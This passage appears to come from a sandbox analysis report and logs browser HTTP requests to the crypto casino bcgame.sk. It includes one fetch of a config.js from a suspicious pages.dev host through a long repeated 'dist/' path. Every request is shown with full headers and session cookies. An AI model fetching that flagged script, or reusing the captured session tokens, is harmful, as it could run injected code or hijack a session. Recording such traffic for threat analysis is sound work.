JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /api/account/get/ HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/plain, */*Accept-Language: ensec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://bcgame.sk/?spin=true&i=p3uc729n&utm_source=p3uc729nAccept-Encoding: gzip, deflate, brCookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /assets/logo/logo.png HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bcgame.sk/?spin=true&i=p3uc729n&utm_source=p3uc729nAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /coin/USD.rect.png HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bcgame.sk/?spin=true&i=p3uc729n&utm_source=p3uc729nAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /assets/index-kxowZSkm.js HTTP/1.1Host: bcgame.skConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /assets/cookie-tVC57MhX.png HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bcgame.sk/?spin=true&i=p3uc729n&utm_source=p3uc729nAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /assets/cryptoonlinecasino-B8XA0kSA.js HTTP/1.1Host: bcgame.skConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /modules/bonus2/remoteEntry.js HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://bcgame.sksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://bcgame.sk/assets/index-DD2Zk4iT.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/config.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /assets/wr_utils.dist-DvgtdgCy-CUXsbV0Z.js HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://bcgame.sksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://bcgame.sk/assets/index-DD2Zk4iT.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /modules/account2/remoteEntry.js HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://bcgame.sksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://bcgame.sk/assets/index-DD2Zk4iT.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /modules/lottery2/remoteEntry.js HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://bcgame.sksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://bcgame.sk/assets/index-DD2Zk4iT.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /assets/ThrowAndHighRolles-DADNM0eC.js HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://bcgame.sksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /assets/bg-BlZBL8HD.svg HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bcgame.sk/?spin=true&i=p3uc729n&utm_source=p3uc729nAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /api/game/support/home/v3/recent-big-wins/?gameTypeId=0 HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/plain, */*Accept-Language: ensec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://bcgame.sk/?spin=true&i=p3uc729n&utm_source=p3uc729nAccept-Encoding: gzip, deflate, brCookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /cache/platform-sports/v14/live10/2103509236163162112/en/ HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/plain, */*Accept-Language: ensec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://bcgame.sk/?spin=true&i=p3uc729n&utm_source=p3uc729nAccept-Encoding: gzip, deflate, brCookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /assets/lottery-BgL2Ay0X.png HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bcgame.sk/?spin=true&i=p3uc729n&utm_source=p3uc729nAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /assets/updown-DQe7IPIb.png HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bcgame.sk/?spin=true&i=p3uc729n&utm_source=p3uc729nAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /assets/sports-C-mawjC1.png HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bcgame.sk/?spin=true&i=p3uc729n&utm_source=p3uc729nAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /test/?p=011923633aced HTTP/1.1Host: socket2v2.bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://bcgame.skSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://bcgame.sk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=
            Source: global trafficHTTP traffic detected: GET /test/?p=011923633aced HTTP/1.1Host: socketv2.bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://bcgame.skSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://bcgame.sk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=
